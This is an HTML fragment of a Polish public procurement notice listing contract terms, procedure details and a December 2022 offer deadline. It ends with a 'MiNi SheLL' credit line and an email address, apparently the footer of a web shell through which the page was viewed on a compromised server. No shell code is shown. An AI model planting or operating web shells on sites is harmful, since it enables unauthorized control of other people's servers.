oświadczenie tej osoby, źe w przypadku wyboru oferiy Wykonawcy osoba ta będzie współpracować<br/>z Wykonawcą w wykonywaniu zamówienia -Załącznik nr 4 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełnomocnictwo o ile wykonawca jest reprezentowany przez pełnomocnika <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> przed zawarciem umowy zamawiający zażąda przedstawienia umowy regulującej zasady współpracy składających wspólną ofertę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ttps://minipotral.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-22 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com